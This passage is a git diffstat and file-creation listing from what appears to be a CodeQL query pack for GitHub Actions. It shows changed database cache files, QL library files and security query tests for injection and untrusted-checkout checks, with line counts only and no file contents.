db/db-yaml/default/cache/pages/33.pack.d | Bin 0 -> 393 bytes db/db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 106 bytes db/db-yaml/default/cache/pages/3c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/3c.pack.d | Bin 0 -> 916 bytes db/db-yaml/default/cache/pages/42.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/42.pack.d | Bin 0 -> 5053 bytes db/db-yaml/default/cache/pages/45.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/45.pack.d | Bin 0 -> 6001 bytes db/db-yaml/default/cache/pages/46.pack | Bin 0 -> 111 bytes db/db-yaml/default/cache/pages/4c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4c.pack.d | Bin 0 -> 302 bytes db/db-yaml/default/cache/pages/4d.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4d.pack.d | Bin 0 -> 3292 bytes db/db-yaml/default/cache/pages/4e.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/4e.pack.d | Bin 0 -> 1048 bytes db/db-yaml/default/cache/pages/54.pack | Bin 0 -> 320 bytes db/db-yaml/default/cache/pages/55.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/5d.pack | Bin 0 -> 221 bytes db/db-yaml/default/cache/pages/62.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/6a.pack | Bin 0 -> 179 bytes db/db-yaml/default/cache/pages/6f.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/6f.pack.d | Bin 0 -> 1695 bytes db/db-yaml/default/cache/pages/7a.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7a.pack.d | Bin 0 -> 1284 bytes db/db-yaml/default/cache/pages/7b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7b.pack.d | Bin 0 -> 151 bytes db/db-yaml/default/cache/pages/84.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/84.pack.d | Bin 0 -> 3788 bytes db/db-yaml/default/cache/pages/88.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/88.pack.d | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/93.pack | Bin 0 -> 113 bytes db/db-yaml/default/cache/pages/96.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/96.pack.d | Bin 0 -> 1651 bytes db/db-yaml/default/cache/pages/9e.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/9e.pack.d | Bin 0 -> 1899 bytes db/db-yaml/default/cache/pages/a1.pack | Bin 0 -> 111 bytes db/db-yaml/default/cache/pages/a3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 5502 bytes db/db-yaml/default/cache/pages/aa.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/aa.pack.d | Bin 0 -> 570 bytes db/db-yaml/default/cache/pages/b5.pack | Bin 0 -> 89 bytes db/db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes db/db-yaml/default/cache/pages/c2.pack | Bin 0 -> 97 bytes db/db-yaml/default/cache/pages/d0.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d0.pack.d | Bin 0 -> 5185 bytes db/db-yaml/default/cache/pages/d5.pack | Bin 0 -> 118 bytes db/db-yaml/default/cache/pages/d6.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/d6.pack.d | Bin 0 -> 1767 bytes db/db-yaml/default/cache/pages/d7.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d7.pack.d | Bin 0 -> 427 bytes db/db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes db/db-yaml/default/cache/pages/e1.pack | Bin 0 -> 96 bytes db/db-yaml/default/cache/pages/e9.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/e9.pack.d | Bin 0 -> 101 bytes db/db-yaml/default/cache/pages/f3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/f3.pack.d | Bin 0 -> 3380 bytes db/db-yaml/default/cache/pages/f6.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/fc.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/pages/fc.pack.d | Bin 0 -> 483 bytes db/db-yaml/default/cache/pages/fd.pack | Bin 0 -> 134 bytes db/db-yaml/default/cache/predicates/00.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/01.pack | Bin 0 -> 219 bytes db/db-yaml/default/cache/predicates/02.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/04.pack | Bin 0 -> 493 bytes db/db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes db/db-yaml/default/cache/predicates/07.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/08.pack | Bin 0 -> 338 bytes db/db-yaml/default/cache/predicates/09.pack | Bin 0 -> 558 bytes db/db-yaml/default/cache/predicates/18.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/1b.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/1c.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 341 bytes db/db-yaml/default/cache/predicates/22.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/24.pack | Bin 0 -> 218 bytes db/db-yaml/default/cache/predicates/25.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/27.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/28.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/29.pack | Bin 0 -> 216 bytes db/db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes db/db-yaml/default/cache/predicates/32.pack | Bin 0 -> 409 bytes db/db-yaml/default/cache/predicates/3a.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 413 bytes db/db-yaml/default/cache/predicates/42.pack | Bin 0 -> 546 bytes db/db-yaml/default/cache/predicates/48.pack | Bin 0 -> 343 bytes db/db-yaml/default/cache/predicates/49.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/4c.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/4e.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/55.pack | Bin 0 -> 145 bytes db/db-yaml/default/cache/predicates/57.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/58.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/59.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 655 bytes db/db-yaml/default/cache/predicates/5f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/60.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/62.pack | Bin 0 -> 419 bytes db/db-yaml/default/cache/predicates/65.pack | Bin 0 -> 357 bytes db/db-yaml/default/cache/predicates/68.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/69.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/72.pack | Bin 0 -> 219 bytes db/db-yaml/default/cache/predicates/73.pack | Bin 0 -> 299 bytes db/db-yaml/default/cache/predicates/74.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes db/db-yaml/default/cache/predicates/77.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7a.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/7d.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/82.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/86.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/87.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/88.pack | Bin 0 -> 291 bytes db/db-yaml/default/cache/predicates/89.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 231 bytes db/db-yaml/default/cache/predicates/8f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/91.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/95.pack | Bin 0 -> 415 bytes db/db-yaml/default/cache/predicates/97.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/98.pack | Bin 0 -> 414 bytes db/db-yaml/default/cache/predicates/99.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/9c.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9d.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 468 bytes db/db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/a4.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/aa.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/ad.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/ae.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/b0.pack | Bin 0 -> 568 bytes db/db-yaml/default/cache/predicates/b2.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/b5.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/b8.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes db/db-yaml/default/cache/predicates/c1.pack | Bin 0 -> 217 bytes db/db-yaml/default/cache/predicates/c4.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes db/db-yaml/default/cache/predicates/cb.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/cc.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/cd.pack | Bin 0 -> 352 bytes db/db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes db/db-yaml/default/cache/predicates/d8.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/df.pack | Bin 0 -> 499 bytes db/db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 353 bytes db/db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 344 bytes db/db-yaml/default/cache/predicates/e6.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/ec.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/ed.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/ee.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/f0.pack | Bin 0 -> 276 bytes db/db-yaml/default/cache/predicates/f2.pack | Bin 0 -> 411 bytes db/db-yaml/default/cache/predicates/f3.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/f6.pack | Bin 0 -> 491 bytes db/db-yaml/default/cache/predicates/f7.pack | Bin 0 -> 217 bytes db/db-yaml/default/cache/predicates/fa.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/fb.pack | Bin 0 -> 215 bytes db/db-yaml/default/cache/predicates/fc.pack | Bin 0 -> 263 bytes db/db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes db/db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/0a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/0c.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/12.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/13.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/14.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1d.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/22.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/2b.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/32.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/35.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/5a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/60.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/65.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/6e.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/71.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/73.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/76.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/78.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/81.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/86.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/8a.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/92.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/9a.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/9d.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/relations/a9.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/aa.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes db/db-yaml/default/cache/relations/b3.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/b4.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/b6.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/b8.pack | Bin 0 -> 435 bytes db/db-yaml/default/cache/relations/bf.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/c4.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/c7.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/cd.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d1.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d6.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/dc.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/e3.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/ee.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/f1.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f7.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f9.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/fd.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/version | 1 + db/db-yaml/default/containerparent.rel | Bin 0 -> 328 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/files.rel | Bin 0 -> 208 bytes db/db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/folders.rel | Bin 0 -> 128 bytes db/db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/locations_default.rel | Bin 0 -> 33384 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes db/db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/pools/0/pageDump/page-000000000 | 55 +++ db/db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes db/db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes db/db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes db/db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/strings/0/pageDump/page-000000000 | 2 + db/db-yaml/default/yaml.rel | Bin 0 -> 33384 bytes db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_locations.rel | Bin 0 -> 11128 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 12540 bytes db/db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240301T120559.348Z.json | 0 ...-diagnostics-add-20240301T120600.004Z.json | 0 .../database-create-20240301.130558.279.log | 321 ++++++++++++++ ...tabase-index-files-20240301.130558.974.log | 44 ++ db/src.zip | Bin 0 -> 20479 bytes ql/lib/codeql/actions/Ast.qll | 391 +++++++++++------ .../codeql/actions/ast/internal/Actions.qll | 398 ------------------ .../actions/controlflow/internal/Cfg.qll | 26 +- .../codeql/actions/dataflow/ExternalFlow.qll | 10 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../dataflow/internal/DataFlowPrivate.qll | 4 +- .../dataflow/internal/DataFlowPublic.qll | 4 +- .../codeql-database.yml | 39 -- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 2 +- .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 4 +- ql/test/library-tests/test.expected | 249 ++++++----- ql/test/library-tests/test.ql | 16 +- .../CWE-020/CompositeActionsSinks.expected | 6 +- .../CWE-020/CompositeActionsSources.expected | 12 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSources.expected | 12 +- .../ReusableWorkflowsSummaries.expected | 12 +- .../CriticalExpressionInjection.expected | 104 ++--- .../CWE-094/ExpressionInjection.expected | 110 ++--- .../MissingActionsPermissions.expected | 2 +- .../CWE-829/UnpinnedActionsTag.expected | 14 +- .../CWE-829/UntrustedCheckout.expected | 2 +- 408 files changed, 1091 insertions(+), 868 deletions(-) create mode 100755 clean.sh create mode 100644 db/baseline-info.json create mode 100644 db/codeql-database.yml create mode 100644 db/db-yaml/default/cache/.lock create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/ids1/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/poolInfo create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/header create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0#0#tttttt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0#1#tt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f#1#ttt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-6e089ab6 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-6e089ab6#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a#1#tt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b18fe878 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b18fe878#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#0# create mode 100644 